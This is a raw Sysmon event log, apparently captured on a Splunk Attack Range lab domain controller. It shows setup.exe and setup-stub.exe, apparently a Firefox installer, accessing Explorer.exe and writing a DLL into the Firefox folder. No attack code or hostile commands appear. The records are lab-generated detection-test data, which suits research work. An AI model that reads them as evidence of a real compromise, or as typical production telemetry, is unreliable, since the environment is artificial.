13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014364Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014363Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014362Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014361Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014360Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014359Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014358Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014357Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014356Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014355Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\api-ms-win-crt-filesystem-l1-1-0.dll2021-01-18 13:59:52.161 10341000x800000000000000014354Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000014353Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000014352Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000014351Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000014350Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014349Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000014348Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014347Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000014346Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
